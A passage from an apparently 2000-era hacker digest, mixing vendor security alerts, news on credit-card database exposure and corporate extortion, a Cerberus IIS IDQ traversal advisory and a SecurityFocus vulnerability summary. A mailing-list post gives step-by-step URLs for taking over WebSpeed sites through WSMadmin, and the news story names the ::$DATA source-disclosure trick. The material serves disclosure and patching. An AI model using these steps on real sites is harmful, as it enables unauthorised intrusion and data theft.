SECURITY ALERT - WAR FTP DAEMON ALL VERSIONS
Updated February 4th 2000 13:30 Central European Time.
January 5th 2000, a seriuos security problem with War FTP Daemon 1.70 was
reported by email. Two hours after I read the mail, a security alert was sent
to the war-ftpd mailing list, the alt.comp.jgaa newsgroup and the bugtraq
mailing list. The alert adviced all server operators to take the server
off-line until further notice.
Brief overview
War FTP Daemon 1.70: The bug allows unrestricted access to any file on the
local machine also for users that have not logged on. If an older ODBC driver
is installed, the bug also gives users unlimited access to all system commands,
with administrator privileges (this is a bug in ODBC that has been fixed in
recent versions). The advice is to take all version 1.70 servers off-line until
the server is upgraded! A bugfix (War FTP Daemon 1.71) was released January 8th
2000 14:40 CET. This version is not completely tested yet. Please report any
serious problems to jgaa@jgaa.com. I Will fix bugs in 1.70 over the next few
weeks to make 1.70 a little more comfortable to use while we wait for version 3.
War FTP Daemon 1.67b2 and previous versions: The bug may give privileged uses
unrestricted access to some files. Users must be logged in, and have at least
write or create permissions. Users can not execute commands. A bugfix was released
less than 24 hours from I read the mail that reported the problem.
Buffer overflow problem in 1.6*
February 2nd 2000 there was reported a buffer-overflow problem in 1.6 versions on
BUGTRAQ. The problem does not seem to compromise the security, but the server can
easily be crashed by remote attackers, after they have logged in. A fix
was released February 3rd 2000, about an hour after I read about the problem.
Bugfixes are released at ftp://ftp.no.jgaa.com and http://war.jgaa.com/alert/files
I'm sorry for any inconveniences caused by these problems.
General news
War FTP Daemon 1.67. I will make a new full distribution for 1.67. Until this is
ready, 1.65 must be installed, and then upgraded.
War FTP Daemon 1.72 service release. I will make a service release of the 1.70
series in the near future. Some annoying bugs will be fixed, and a command-line
utility to add user accounts interactively, or from scripts, will be released.
There will also be a simple DLL wrapper interface for easy integration with other
software.
War FTP Daemon 3.0. The development of the next major release continues. 3.0 is
currently running under Windows NT and Linux. The server is however not yet ready
for alpha-testing. When all the basic functionality is implemented, and debugged,
ftp://ftp.jgaa.com will open up, using version 3.0. This can be expected soon.
Early versions for Windows 9x, Windows NT, Debian Linux and FreeBSD will be
available for download. Version 3.0 will be Open Source, under the GNU Public License.
http://download.jgaa.com will open when War FTP Daemon 3.0 moves into early alpha.
Jarle
@HWA
29.0 HNN: Jan 17th: Seven eCommerce Sites Found Vulnerable
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by mack
MSNBC found seven ecommerce sites open for business
with easily accessible customer databases. By
connecting to weakly secured SQL databases MSNBC
was able to access the personal information including
credit card numbers of 2500 people. All of the sites
have been informed of the problem. (And people act
surprised when I tell them that I don't buy anything on
the web.)
MSNBC
http://www.msnbc.com/news/357305.asp
Stealing cards easy as Web browsing
By Bob Sullivan
MSNBC
Jan. 14 Just how easy is it to steal credit card
numbers on the Internet? On Thursday, MSNBC
was able to view nearly 2,500 credit card
numbers stored by seven small e-commerce Web
sites within a few minutes, using elementary
instructions provided by a source. In all cases, a
list of customers and all their personal
information was connected to the Internet and
either was not password-protected or the
password was viewable directly from the Web
site.
CREDIT CARD THEFT, a problem long lurking in the
background of Internet commerce, leaped to the top of
consumers minds earlier this month when a computer
intruder calling himself Maxus was able to break into CD
Universes database of user credit cards. Theres still
speculation about how he did it.
But perhaps Maxus didnt have to work so hard. This
week, MSNBC was able to view nearly 2,500 credit card
numbers and other data essentially by browsing
e-commerce Web sites using a commercially available
database tool rather than a Web browser. Not only were
the sites storing the credit cards in plain text in a database
connected to the Web the databases were using the
default user name and in some cases, no password.
These basic security flaws were found by a legitimate
Russian software company named Strategy LLC, according
to CEO Anatoliy Prokhorov, and shared with MSNBC. He
says he tried contacting some of the companies first and got
no response.
From our point of view this is just unprofessionalism in
a very high degree thats not explainable, Prokhorov said.
His company writes software that helps consumers compare
prices across multiple e-commerce sites, so his developers
become familiar with data structures at hundreds of
e-commerce sites. He says they werent looking to find
security flaws, but rather stumbled on these.
This is just a hole we passed by, an open door. Our
people were amazed.
But security experts were not. Given the speed
required to succeed in the fast-paced Internet economy,
companies are in a big hurry to publish working Web sites
and often skimp on security measures.
This is a microcosm of whats out there, said Elias
Levy of SecurityFocus.com. Levys site was the first to
report the CD Universe break-in last weekend. One could
only imagine what they would have found if they were
looking for problems.... The problem is fairly widespread,
and what Anatoliy has found is a small snapshot.
Prokhorov also contacted SecurityFocus.com with his
information, and the site today will issue its own report
based on its independent investigation.
The security flaws Prokhorov found involve more than
just easy-to-steal credit cards. At all seven sites, MSNBC
was able to view a wide selection of personal data including
billing addresses, phone numbers and in some cases,
employee Social Security numbers.
Prokhorov sent the list and instructions to MSNBC on
Tuesday. It included about 20 Web sites which either had
no password protection at all on their database servers
in each case, they were running Microsofts SQL Server
software or had password information exposed on their
Web site. Connecting to all the sites was as simple as
starting SQL Server and opening a connection to the Web
site. (Note: Microsoft is a partner in MSNBC.)
Expressmicro.com, Computerparts.com, Directmicro.com
and Sharelogic.net were all contacted 24 hours before
this story so they could close the security hole.
While the flaws are obvious, assessing blame is a much
more sticky business. Theres a mounting concern that small
businesses are particularly vulnerable to attack; many dont
have computer experts on staff. Other times, non-technically
savvy business owners take lowball bids from developers
who promise a secure Web site but dont deliver. Then
there are inherent problems in software itself that make
flaws more likely.
In some cases, the server-side code underlying a Web
page is viewable if a browser places ::$DATA at the end
of the pages Web address. That code, normally hidden,
can contain any usernames, passwords and other
information about any computer connected to that server.
This flaw was revealed over two years ago and has since
been patched. Four of the vulnerable sites MSNBC found
were hosted on the same Web server and had not plugged
this hole.
But even without knowing that technique, an intruder
could have entered the sites anyway the username
required for entering the database was the default sa,
which stands for system administrator; the password was
the name of the company.
We used a developer, and obviously the developer
didnt take that flaw into consideration, said a
spokesperson for the sites. The flaw could have lied within
the software, but maybe the developer should have taken
that into consideration ... and one thing we didnt do, we
didnt hire a security company to come in and test our Web
site.
Getting a second opinion when building an e-commerce
site is a good idea, said security expert Russ Cooper, who
maintains the popular NTBugTraq mailing list.
Make a condition of the contract that it has to pass
scrutiny of another individual who tests the site, Cooper
recommended. The fundamental problem, he said, is that
developers have no liability for flaws they leave behind in
e-commerce sites. Merchants are responsible for the cost of
any stolen merchandise, while most developer contracts
make clear they are not responsible for what happens with a
site they build. So a lot of people end up with a working
site but not a secure site.
The other three vulnerable sites MSNBC visited simply
used sa as the username for their database, and no
password.
Average consumers have no way of knowing how
well-guarded their personal information is when they submit
it to a Web site. Levy said the problems MSNBC found at
these seven sites are hardly isolated.
The blame falls on more than one person. You cant
rush out to set up an e-commerce site regardless of how
much you want to make money. ... Many people dont give
(security) a second thought, he said.
One of the fundamental flaws in all these sites and,
experts say, in many other sites is the storing of private
consumer information in the first place. While encryption
techniques that scramble the data are available, its often
kept on a computer in plain text one step away from the
Internet. While thats more convenient, experts agree its a
bad idea.
My advice is, if nothing else, dont store the data
where it physically has access to the Web, said Wesley
Wilhelm, a fraud prevention consultant at the Internet Fraud
Prevention Advisory Council. Take them off every night
and make a sneakernet run.
As for consumers, there isnt much they can do to
ascertain how well a Web site is guarding their personal
information. Some experts suggest using only one card
online, and religiously checking credit card bills. While
consumers are liable for at most $50 of fraudulent
purchases, they are responsible for catching them and
alerting their bank.
MSNBCs Curtis Von Veh contributed to this story.
@HWA
30.0 HNN:Jan 17: Scotland Yard Investigating Cyber Ransom Demands
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by tom
It is alleged the a team of sophisticated professional
electronic intruders have broken into twelve
multinational companies and have issued ransom
demands to prevent the release of stolen information.
This report only names one of the company's in
question, Visa, and says that Scotland Yard is
investigating. (While it would appear that Visa has
admitted to the intrusion we would like know who the
other companies are.)
The UK Times
http://www.the-times.co.uk/news/pages/sti/2000/01/16/stinwenws01028.html?999
January 16 2000
BRITAIN
Hacker gang blackmails
firms with stolen files
Jon Ungoed-Thomas and Stan Arnaud
A BRITISH group of hackers has broken into the computer
systems of at least 12 multinational companies and stolen
confidential files. It has issued ransom demands of up to
£10m and is also suspected of hiring out its services.
Scotland Yard is now investigating the attacks, which
computer experts have described as the most serious
systematic breach ever of companies' security in Britain.
"The group is using very sophisticated techniques and has
been exchanging information via e-mail and internet chat,"
said an investigator.
Visa confirmed last week that it had received a ransom
demand last month, believed to have been for £10m.
"We were hacked into in mid-July last year," said Russ
Yarrow, a company spokesman. "They gained access to
some corporate material and we informed both Scotland
Yard and the FBI."
It is understood the hackers stole computer "source codes"
that are critical to programming, and threatened to crash the
entire system. If Visa's system crashed for just one day, the
company - which handles nearly £1 trillion business a year
from customers holding 800m Visa cards - could lose tens of
millions of pounds.
"We received a phone call and an e-mail to an office in
England demanding money," Yarrow said.
The company contacted police after the ransom demand.
"We hardened the system, we sealed it and they did not
return. We have firewalls upon firewalls, but are concerned
that anyone got in."
Scotland Yard's computer crime unit is now scrutinising
e-mail traffic between several known hackers in England and
Scotland. Last month officers from the unit flew to
Hopeman, a Scottish fishing village, and seized equipment
from the home of James Grant, who works for a local
computer company. He has been interviewed by detectives
and Visa security experts.
It is understood that he has given a legal undertaking to Visa
not to discuss the matter. "He is saying nothing at all," said
his mother, Rhona. "That is a situation that will not change in
the future."
Grant, 20, studied computing in nearby Elgin, and now
works for Data Converters, based in Elgin. His father is a
member of the civilian security staff at RAF Lossiemouth air
base and his mother a care worker.
Detectives are studying attacks on at least 12 companies that
they believe have been penetrated by the group and others
that may be connected, including one within the Virgin group,
in which a hacker tried to break into the UK mailing system.
They believe the group may also be acting as paid specialists
for information brokers who trade corporate secrets.
"These are professionals and there is some evidence that
suggests some of the activity was contracted and paid for,"
said a computer expert involved in the investigation.
The group's success has exposed flaws in security. The
internet company CD Universe last week confirmed it had
called in the FBI after being blackmailed by a hacker who
had copied more than 300,000 of its customer credit card
files.
Scotland Yard said: "There is an ongoing investigation into
the incident involving Visa, but it is too early to speculate
about the involvement of a group."
@HWA
31.0 HNN:Jan 17: Pay Phone Fraud Committed with Drinking Straw
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SUCK THIS!
From HNN http://www.hackernews.com/
contributed by deeeek
Telstra (Australian Telephone Company) has to upgrade
29,000 payphones due to fraud involving a drinking
straw. The problem affects 80% of the pay phones
installed since 1997. No information about exactly how
the fraud was committed was given. (A Straw? Oh,
there must be a text file on this somewhere.)
Fairfax IT
http://it.fairfax.com.au/breaking/20000114/A24452-2000Jan14.html
Scam forces Telstra to fix 29,000 pay phones
9:17 Friday 14 January 2000
AAP
TELSTRA is urgently modifying 80 per cent of its public pay phones after
a scam was discovered involving a drinking straw and free phone calls
around the world.
Telstra would have the 29,000 vulnerable phones rectified soon, Telstra's
public affairs manager Michael Herskope said yesterday.
The Spanish-manufactured coin and phone card-operated Smart pay phone
was phased into the Australian network from 1997.
The scam potentially cost Telstra millions of dollars in unlimited STD
and ISD calls since then, but Telstra can only speculate.
"We have a rough idea, but that's not something we're really going to
publicise,'' Herskope said.
The scam was made public on the front page of Albury-Wodonga's The Border
Morning Mail yesterday.
The newspaper was told by perpetrators that the low-tech scam had been
well known since the phones were introduced as part of a $100 million
upgrade of the public phone national network.
One source said some people may have learnt about it from the Internet.
The paper accompanied a man to three public phones chosen at random and
observed him make free calls, including one to New York.
Telstra had initially dismissed the scam as a myth, the paper said.
But Herskope denied that Teltra only learnt of the fraud from the country
newspaper.
"We've known about it for a little while,'' he said.
"It's pretty hard to articulate weeks, days. I'm not sure how it was brought
to our attention but it certainly was.''
He said rectifying the problem was a simple procedure.
Without disclosing how the fraud was perpetrated, he said there was no design
fault in the phone.
"This particular fault will be closed off very shortly,'' he said.
@HWA
32.0 Owning sites that run WebSpeed web db software
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Source: win2k security advice mailing list.
From: George <georger@NLS.NET>
To: <win2ksecadvice@LISTSERV.NTSECURITY.NET>
Sent: Friday, February 04, 2000 7:32 PM
Subject: Webspeed security issue leaves sites vulnerable
I reported this to Progress (maker of Webspeed) a month ago and they said
they would fix it but since then I've not seen any fixes released. I also
pondered whether or not to release this information because some rather
large web databases use Webspeed but I do believe in full disclosure as the
best security so here goes...
Webspeed is a website creation language used by some of the larger db based
websites on the net. Version 3 comes with a java GUI configuration program.
This configuration program has certain security setting options in it. One
of which doesn't actually do anything.
There is one option to turn off access to a utility called WSMadmin. It's in
the messenger section of the GUI config program. However checking or
unchecking this option doesn't change anything. In fact to turn this feature
off you have to hand edit the ubroker.properties file. Look for the
following entries:
AllowMsngrCmds=1
and each time you find this set it =0 in each of the sections. This will
disable the feature (you want to do this on the production server).
AllowMsngrCmds=0
Ok, now the exploit to show how serious an issue this is on the web. It's
just a misconfiguration really but it's caused by a bug in the java config
program (I tested the NT version but since the config program is java it may
also affect other platforms)
Exploit:
go to search engines and search for "wsisa.dll", I used google 3rd page or
further (first 3 pages are all junk)
Go to URL similar to
http://www.domain.com/scripts/wsisa.dll/extra/somepage.htm with your browser
change the url in the browser to
http://www.domain.com/scripts/wsisa.dll/WService=anything?WSMadmin
(note capitals are important)
click on the link "End Sessions Logging and Display Sessions Info" (note you
may have to start logging first then stop it if they've never used the
logging feature)
When you pick the End Sessions Logging choice it displays the log, find a
statement in the log for the default service "Default Service =
nameofservice"
back up one page (hit your back button)
type nameofservice into the Verify WebSpeed Configuration box and click the
verify button.
If everything worked you now own their site. I won't explain how to use the
utility but anyone familiar with this should know exactly how dangerous this
is.
Geo.
_____________________________________________________________________
** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net
@HWA
33.0 Cerberus Information Security Advisory (CISADV000202)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Cerberus Information Security Advisory (CISADV000202)
http://www.cerberus-infosec.co.uk/advisories.html
Released : 2nd February 2000
Name : IDQ
Affected Systems : Microsoft Windows NT 4 running Internet Information
Server 3 or 4
Issue : Attackers can access files outside of the web
virtual
directory system
Author : David Litchfield (mnemonix@globalnet.co.uk)
Description
*********
Any web site running Internet Information Server 3 or 4 and
using Internet Data Query files to provide search functionality on the site
may be exposed. IIS also comes with some sample IDQ scripts that are
vulnerable so any website with these sample files left on are at risk.
Using these IDQ scripts or even custom scripts it is possible to break
outside of the web virtual root and gain unathorized access to files,
such as log files and in certain cases the backup version
of the Security Accounts Manager (sam._)
It does require for the attacker to know the path to the file, for the file
to be on the same logical disk drive as the IDQ file and for ACL to allow
read access to the anonymous Internet account or the Everyone/guests group.
Details
*****
The extent of this security hole depends upon whether the recent "webhits"
patch
has been installed. See
http://www.microsoft.com/technet/security/bulletin/ms00-006.asp
If the patch has been installed there is still a vulnerability - however,
those that
have not installed this patch are most at risk. Microsoft are re-releasing
this advisory
and the updated patch. Please note that Windows 2000 does not seem to be
vulnerable to
this. Cerberus' vulnerability scanner, CIS, has now been updated to check
for this issue.
For those that already have a copy of the scanner you can download the
updated module
from http://www.cerberus-infosec.co.uk/webscan.dll - however those that do
not yet have
the scanner, if you would like a copy please go to
http://www.cerberus-infosec.co.uk/ and follow
the Cerberus Internet Scanner link on the frontpage.
If the "webhits" patch HAS NOT been installed
************************************
Any idq file that resolves remote user input for any part of the template
file is dangerous.
eg: CiTemplate = %TemplateName%
The ISAPI application that deals with IDQ queries is idq.dll and it will
follow double dots in paths to template files, meaning an attacker can
break out of the web root. If the idq file appends .htx to the CiTemplate
eg: CiTemplate=/iissamples/issamples/%TemplateName%.htx
some may think this will limit attackers to viewing only .htx files. Not so.
Quoting from the Index Server documentation (/iishelp/ix/htm/ixidqhlp.htm),
"Index Server does not support physical paths longer than the Windows NT
shell limit (260 characters)." Due to this limit it is possible to append
lots of spaces onto the name of the file we want to read and thereby
pushing the .htx out of the buffer and we're served back the file.
IDQ files known to be at risk in one way or another:
prxdocs/misc/prxrch.idq
iissamples/issamples/query.idq
iissamples/exair/Search/search.idq
iissamples/exair/Search/query.idq
iissamples/issamples/fastq.idq
There are may be more.
If the "webhits" patch HAS been installed
*******************************
Machines that have had the patch installed will only be vulnerable if the
IDQ file does not specify a .htx extention
eg:
CiTemplate = %TemplateName%
and
CiTemplate = /somedir/otherdir/%TemplateName%
are vulnerable whereas
CiTemplate = /somedir/otherdir/%TemplateName%.htx
is not vulnerable.
Solution:
*******
Review your IDQ files to determine if you are at risk. If so edit them
and use hardcoded template files. eg
CiTemplate=%TemplateName%
to
CiTemplate=/your-virtual-directory/your-htx-file.htx
and then edit your search form to reflect this change.
Remove any sample files from the system - not just
idq files. Apply the updated patch.
About Cerberus Information Security, Ltd
********************************
Cerberus Information Security, Ltd, a UK company, are specialists in
penetration testing and other security auditing services. They are the
developers of CIS (Cerberus' Internet security scanner) available for free
from their website: http://www.cerberus-infosec.co.uk
To ensure that the Cerberus Security Team remains one of the strongest
security audit teams available globally they continually research operating
system and popular service software vulnerabilites leading to the discovery
of "world first" issues. This not only keeps the team sharp but also helps
the industry and vendors as a whole ultimately protecting the end consumer.
As testimony to their ability and expertise one just has to look at exactly
how many major vulnerabilities have been discovered by the Cerberus Security
Team - over 40 to date, making them a clear leader of companies offering
such security services.
Founded in late 1999, by Mark and David Litchfield, Cerberus Information
Security, Ltd are located in London, UK but serves customers across the
World. For more information about Cerberus Information Security, Ltd please
visit their website or call on +44(0) 181 661 7405
Permission is hereby granted to copy or redistribute this advisory but only
in its entirety.
Copyright (C) 2000 by Cerberus Information Security, Ltd
------------------------------------------------------------------------
Delivery co-sponsored by Trend Micro, Inc.: http://www.antivirus.com.
ScanMail for Microsoft Exchange
* Stops viruses from spreading through Exchange Servers.
* Eliminates viruses from email in real time, even unknown macro viruses
* Filters spam (unsolicited junk email).
* Sends customized virus warning messages to specific parties and admins
* Remote installation and management via web or ScanMail's Windows GUI
------------------------------------------------------------------------
_____________________________________________________________________
** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net
@HWA
34.0 Security Focus Newsletter #26
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Security Focus Newsletter #26
Table of Contents:
I. INTRODUCTION
II. BUGTRAQ SUMMARY
1. Multiple Vendor BSD /proc File Sytem Vulnerability
2. DNS TLD & Out of Zone NS Domain Hijacking
3. Inter7 vpopmail (vchkpw) Buffer Overflow Vulnerability
4. VMware Symlink Vulnerability
5. HP Path MTU Discovery DoS Vulnerability
6. Microsoft East Asian Word Conversion Vulnerability
7. NT RDISK Registry Enumeration File Vulnerability
8. Qualcomm qpopper 'LIST' Buffer Overflow Vulnerability
9. NT Index Server Directory Traversal Vulnerability
III. PATCH UPDATES
1. Vulnerability Patched: Qualcomm qpopper 'LIST' Buffer Overflow
2. Vulnerability Patched: NT Index Server Directory Traversal
3. Vulnerability Patched: Multiple Vendor BSD /proc File Sytem
4. Vulnerability Patched: Multiple Vendor BSD /proc File Sytem
5. Vulnerability Patched: Inter7 vpopmail (vchkpw) Buffer Overflow
6. Vulnerability Patched: NT RDISK Registry Enumeration File
7. Vulnerability Patched: Microsoft East Asian Word Conversion
8. Vulnerability Patched: Multiple Vendor BSD make /tmp Race
IV. SECURITYFOCUS.COM TOP 6 NEWS ARTICLES
1. Outpost Leaves Data Unguarded (Mon Jan 24 2000)
2. Japan Says to Seek U.S. Help to Deal With Hackers (Tue Jan 25
2000)
3. Task Force Battles Online Criminals (Wed Jan 26 2000)
4. Smart card 'inventor' lands in jail (Thu Jan 27 2000)
5. Visa acknowledges cracker break-ins (Fri Jan 28 2000)
6. A Year Of Mass-Mailing Viruses (Fri Jan 28 2000)
V. INCIDENTS SUMMARY
1. Got scanned again (Thread)
2. Unusual scan pattern (Thread)
3. Possible Probe = Possible Malfunction (Thread)
4. No Idea (Thread)
5. PC Anywhere client seems to probe class C of connected networks
(Thread)
6. unapproved AXFR (Thread)
7. Connect thru PIX & ports 1727, 2209, 9200 (Thread)
8. Anti-Death Penalty (Thread)
9. Strange DNS/TCP activity (Thread)
10. eri? (Thread)
11. source port 321 (Thread)
12. Korea (again) (Thread)
13. BOGUS.IvCD File (Thread)
14. port 768 (Thread)
15. Extrange named messages (Thread)
16. Probes to tcp 2766 ('System V Listner') (Thread)
17. Possible attempt at hacking? (Thread)
18. DNS update queries: another sort of suspicious activity.
(Thread)
VI. VULN-DEV RESEARCH LIST SUMMARY
1. Shadow (Thread)
2. things to break.. (Thread)
3. HTTP scanners? (summary, long) (Thread)
4. CGI insecurities (Thread)
5. ICQ Pass Cracker. (Thread)
6. File Share Vacuum (Thread)
7. IIS4.0 .htw vulnerability (Thread)
8. Napster a little insecure? (Thread)
9. distributed.net and seti@home (Thread)
VII. SECURITY JOBS
Seeking Employment:
1. Prashant Vijay (Summer Internship) <vijay@eecs.tulane.edu>
Seeking Staff:
1. Security Research Engineer (Atlanta, Ga)
2. Practice Manager w/PKI experience NYC, Philly or DC)
3. Lead Security Engineer - Bay Area/San Jose
4. Senior security engineers - Bay Area/San Jose
5. Virus coder wanted (San Antonio, TX)
6. Junior Security Engineers Needed (Maryland)
VIII. SECURITY SURVEY RESULTS
IX. SECURITY FOCUS TOP 6 TOOLS
1. ShadowScan 1.00.093 (Windows 95/98 and Windows NT)
2. SecurityFocus.com Pager (Win95/98/NT)
3. lidentd 1.0p1 (Linux)
4. Cgi Sonar 1.0 (any system supporting perl)
5. Logcheck 1.1.1 (BSDI, Digital UNIX/Alpha, FreeBSD, HP-UX,
Linux, NetBSD, OpenBSD, Solaris and SunOS)
6. Secret Sharer 1.0 1.0 (Windows 95/98)
X. SPONSOR INFORMATION - CORE SDI http://www.core-sdi.com
XI. SUBSCRIBE/UNSUBSCRIBE INFORMATION
I. INTRODUCTION
-----------------
Welcome to the SecurityFocus.com 'week in review' newsletter issue 26 for
the time period of 2000-01-24 to 2000-01-30 sponsored by CORE SDI.
CORE SDI is an international computer security research and development
company. It's clients include 3 of the Big 5 chartered accountant firms
for whom CORE SDI develops customized security auditing tools as well as
several notable computer security product vendors, such as Network
Associates. In addition to providing 'consultant to the consultant'
services CORE also performs risk assesment and security infrastructure
consulting for a large number of government and fortune 500 companies in
both North and Latin America.
http://www.core-sdi.com
II. BUGTRAQ SUMMARY 2000-01-24 to 2000-01-30
---------------------------------------------
1. Multiple Vendor BSD /proc File Sytem Vulnerability
BugTraq ID: 940
Remote: No
Date Published: 2000-01-21
Relevant URL:
http://www.securityfocus.com/bid/940
Summary:
Certain BSD derivative operating systems use an implantation of the /proc
filesystem which is vulnerable to attack from malicious local users. This
attack will gain the user root access to the host.
The proc file system was originally designed to allow easy access to
information about processes (hence the name). It's typical benefit is
quicker access to memory hence more streamlined operations. As noted
previously certain implementations have a serious vulnerability. In short,
the vulnerability is that users may manipulate processes under system
which use /proc to gain root privileges. The full details are covered at
length in the advisory attached to the 'Credit' section of this
vulnerability entry.
2. DNS TLD & Out of Zone NS Domain Hijacking
BugTraq ID: 941
Remote: Yes
Date Published: 2000-01-23
Relevant URL:
http://www.securityfocus.com/bid/941
Summary:
A vulnerability exists in the mechanism used by DNS, in general, to
determine the name server associated with TLD's (top level domains). DNS
is built upon levels of trust, and by exploiting single points of failure
in this trust system, it becomes possible for an attacker to convince a
caching nameserver that allows for recursion through it that the root
server for a given TLD is something other than what it actually is. By
consecutively performing these cache attacks, it could be possible for an
attacker to entirely take over name service for any given domain.
The vulnerability is actually not specific to TLD's. The same attack can
be used to hijack any domain which has out of zone NS records, if any of
the servers that act as the name server for the out of zone domain can be
compromised.
The simplest explanation was presented in the example provided by it's
discoverer, Dan Bernstein, on the Bugtraq mailing list, on January 23,
2000: "Suppose an attacker can make recursive queries through your cache.
Let me emphasize that this does not mean that the attacker is one of your
beloved users; many programs act as DNS query-tunneling tools.
Suppose the attacker is also able, somehow, to take over ns2.netsol.com.
This isn't one of the .com servers, but it's a name server for the
gtld-servers.net domain. Here's what happens:
(1) The attacker asks your cache about z.com. Your cache contacts
(say) k.root-servers.net, which provides a referral:
com NS j.gtld-servers.net (among others)
j.gtld-servers.net A 198.41.0.21
These records are cached.
(2) The attacker asks your cache about z.gtld-servers.net. Your cache
contacts (say) f.root-servers.net, which provides a referral:
gtld-servers.net NS ns2.netsol.com (among others)
ns2.netsol.com A 207.159.77.19
These records are cached.
(3) The attacker takes over ns2.netsol.com.
(4) The attacker asks your cache about zz.gtld-servers.net. Your
cache contacts ns2.netsol.com, and the attacker
answers:
zz.gtld-servers.net CNAME j.gtld-servers.net
j.gtld-servers.net A 1.2.3.4
These records are cached, wiping out the obsolete j glue.
(5) A legitimate user asks your cache about yahoo.com. Your cache
contacts j.gtld-servers.net, and the attacker answers:
yahoo.com A 1.2.3.4
The user contacts yahoo.com at that address."
The attack offered requires that an attacker be able to compromise the
operation of the DNS server running on, in this case, ns2.netsol.com,
although this is not the only server that could potentially be used to
launch an attack of this style. The author further indicates that there
are in excess of 200 servers that could be used to manipulate resolution
of all the .COM domains.
3. Inter7 vpopmail (vchkpw) Buffer Overflow Vulnerability
BugTraq ID: 942
Remote: Yes
Date Published: 2000-01-21
Relevant URL:
http://www.securityfocus.com/bid/942
Summary:
Vpopmail (vchkpw) is free GPL software package built to help manage
virtual domains and non /etc/passwd email accounts on Qmail mail servers.
This package is developed by Inter7 (Referenced in the 'Credit' section)
and is not shipped, maintained or supported by the main Qmail
distribution.
Certain versions of this software are vulnerable to a remote buffer
overflow attack in the password authentication of vpopmail.
4. VMware Symlink Vulnerability
BugTraq ID: 943
Remote: No
Date Published: 2000-01-21
Relevant URL:
http://www.securityfocus.com/bid/943
Summary:
VMware is software that runs multiple virtual computers on a single PC, at
the same time, without partitioning or rebooting.
Certain versions of the VMWare for Linux product do not perform /tmp file
sanity checking and create files in the /tmp directory which will follow
symlinks. This may be used by a malicious user to overwrite any file (with
log data) which falls within the write permissions of the user ID which
VMWare excecutes as. Typically this is root. This attack will most likely
result in a denial of service and not a root level compromise.
5. HP Path MTU Discovery DoS Vulnerability
BugTraq ID: 944
Remote: Yes
Date Published: 2000-01-24
Relevant URL:
http://www.securityfocus.com/bid/944
Summary:
A potential denial of service exists in Hewlett-Packard's proprietary
protocol for discovering the maximum path MTU (PMTU) for a give
connection. This feature could potentially be used to cause denial of
services, using HPUX machines as "amplifiers." Essentially, HP machines
which are vulnerable can, under certain conditions, be coerced in to
sending far more data outbound than they receive inbound. By forging
source addresses, it is possible to send a small quantity of packets
purporting to be from a given source, and cause the HPUX machine to send
multiple packets in response. This could potentially be used as a denial
of service.
HP's proprietary path discover protocol works by sending data in parallel
with ICMP packets being used for path discovery. While exact details of
the nature of the denial of service were not made public, presumably it
could be possible to utilize UDP packets, and default UDP services to
start the chain of events leading to a denial of service
6. Microsoft East Asian Word Conversion Vulnerability
BugTraq ID: 946
Remote: No
Date Published: 2000-01-20
Relevant URL:
http://www.securityfocus.com/bid/946
Summary:
East Asian language versions of Word and Powerpoint are susceptible to a
buffer overflow exploit. The overflowable buffer is in the code that
converts Word 5 documents into newer formats. Word 97, 98, and 2000 will
automatically convert older files into the new format upon loading.
If a specially-modified Chinese, Japanese or Korean Word 5 document is
loaded into a newer version of Word or PowerPoint, arbitrary code can be
executed during the conversion process, at the privilege level of the
current user.
7. NT RDISK Registry Enumeration File Vulnerability
BugTraq ID: 947
Remote: No
Date Published: 2000-01-21
Relevant URL:
http://www.securityfocus.com/bid/947
Summary:
The Rdisk utility shipped with all versions of Windows NT4.0 is used to
make an Emergency Repair Disk. During the creation of this disk, a
temporary file ($$hive$$.tmp) is created in the %systemroot%\repair
directory that contains the registry hives while they are being backed up.
The group Everyone has Read permission to this file, and in this manner
sensitive information about the server could be leaked.
The file is put in a location that is not shared by default, and is
removed immediately after the disk is created. The only likely scenario
where this could be exploited is in the case of NT Terminal Server, where
an administrator and a regular user could both be logged in interactively
at the same time.
8. Qualcomm qpopper 'LIST' Buffer Overflow Vulnerability
BugTraq ID: 948
Remote: Yes
Date Published: 2000-01-26
Relevant URL:
http://www.securityfocus.com/bid/948
Summary:
There is a remotely exploitable buffer overflow in Qaulcomm's 'qpopper'
daemon which allows users already in possession of a username and password
for a POP account to compromise the server running the qpopper daemon.
The problem lies in the code to handles the 'LIST' command available to
logged in users. By providing an overly long user supplied argument a
buffer may be overflowed resulting in the attacker gaining access with the
user ID (UID) of the user who's account is being used for the attack and
the group ID (GID) mail.
This will result in remote access to the server itself and possibly
(depending on how the machine is configured) access to read system users
mail via the GID mail.
9. NT Index Server Directory Traversal Vulnerability
BugTraq ID: 950
Remote: Yes
Date Published: 2000-01-26
Relevant URL:
http://www.securityfocus.com/bid/950
Summary:
Index Server 2.0 is a utility included in the NT 4.0 Option Pack. The
functionality provided by Index Service has been built into Windows 2000
as Indexing Services.
When combined with IIS, Index Server and Indexing Services include the
ability to view web search results in their original context. It will
generate an html page showing the query terms in a short excerpt of the
surrounding text for each page returned, along with a link to that page.
This is known as "Hit Highlighting". To do this, it supports the .htw
filetype which is handled by the webhits.dll ISAPI application. This dll
will allow the use of the '../' directory traversal string in the
selection of a template file. This will allow for remote, unauthenticated
viewing of any file on the system whose location is known by the attacker.
III. PATCH UPDATES 2000-01-24 to 2000-01-30
-------------------------------------------
1. Vendor: Qualcomm
Product: Qpopper
Vulnerability Patched: Qualcomm qpopper 'LIST' Buffer Overflow
Bugtraq ID: 948
Relevant URLS:
http://www.eudora.com/freeware/qpop.html#BUFFER
http://www.securityfocus.com/bid/948
Patch Location:
